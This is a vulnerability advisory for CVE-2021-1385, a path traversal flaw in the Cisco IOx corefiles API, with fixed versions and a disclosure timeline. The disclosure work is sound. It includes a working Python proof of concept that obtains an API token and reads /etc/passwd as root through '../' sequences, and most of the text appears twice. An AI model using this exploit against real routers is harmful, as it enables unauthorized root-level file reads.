Overview
IOx gives the ability to host containers on Cisco routers. Once enabled the router provides an API. This API allows to install, activate and start containers.
core_dir is a directory that can be used by both the API and the container itself.
The API that allows to get these files is vulnerable to path traversal allowing to read files on the host (as root).
Also the creation of symlink from the container in this directory is wrongly solved by the API on the host (same issue as #3).
Impact
This results in arbitrary read with root privileges on the host filesystem.
Detail
The corefiles API is using getCoreFile for path resolution.
It gets the directory on the host and calculate the path depending on core_filename provided by the user.
A regular expression prevents the user to provide a core_filename not starting with a word or a space.
But if the attacker can create a directory in its core_dir directory:
[root@guestshell guesshell]# cd /local/local1/core_dir/
[root@guestshell core_dir]# mkdir test
Then a valid path such as test/../../../../../<path> can be provided by the user.
Proof of Concept
Here is a python script that allows to download files on the host. It requires the existence of directory /local/local1/core_dir/test on the container.
import requests
import base64
# Please replace it with valid login and password
pwd=base64.b64encode(b'<REDACTED>:<REDACTED>')
h = {'Authorization': b'Basic ' + pwd}
r=requests.post('https://192.168.1.39/iox/api/v2/hosting/tokenservice', headers=h, verify=False)
token=r.json()['token']['id']
headers = {
'X-Token-Id': token
}
r=requests.get('https://192.168.1.39/iox/api/v2/hosting/apps/guestshell/corefiles?corefile=test/../../../../../../../../../etc/passwd',headers=headers, verify=False)
res = r.text
print("File Content:\n%s"%res)
Solution
Security patch
Cisco fixed this vulnerability from:
- 17.3(2.5) and later
- 17.3.3 and later
- 17.5(0.144) and later
- 17.5.1 and later
- 17.6.(0.17) and later
- 17.6.1 and later
Workaround
There are no workarounds that address this vulnerability.
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-pt-hWGcPf7g
https://nvd.nist.gov/vuln/detail/CVE-2021-1385
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Timeline
Date reported: November 27, 2020
Date fixed: March 24, 2021
Overview
IOx gives the ability to host containers on Cisco routers. Once enabled the router provides an API. This API allows to install, activate and start containers.
core_diris a directory that can be used by both the API and the container itself.The API that allows to get these files is vulnerable to path traversal allowing to read files on the host (as root).
Also the creation of symlink from the container in this directory is wrongly solved by the API on the host (same issue as #3).
Impact
This results in arbitrary read with root privileges on the host filesystem.
Detail
The
corefilesAPI is usinggetCoreFilefor path resolution.It gets the directory on the host and calculate the path depending on
core_filenameprovided by the user.A regular expression prevents the user to provide a
core_filenamenot starting with a word or a space.But if the attacker can create a directory in its
core_dirdirectory:Then a valid path such as
test/../../../../../<path>can be provided by the user.Proof of Concept
Here is a python script that allows to download files on the host. It requires the existence of directory
/local/local1/core_dir/teston the container.Solution
Security patch
Cisco fixed this vulnerability from:
Workaround
There are no workarounds that address this vulnerability.
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-pt-hWGcPf7g
https://nvd.nist.gov/vuln/detail/CVE-2021-1385
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Timeline
Date reported: November 27, 2020
Date fixed: March 24, 2021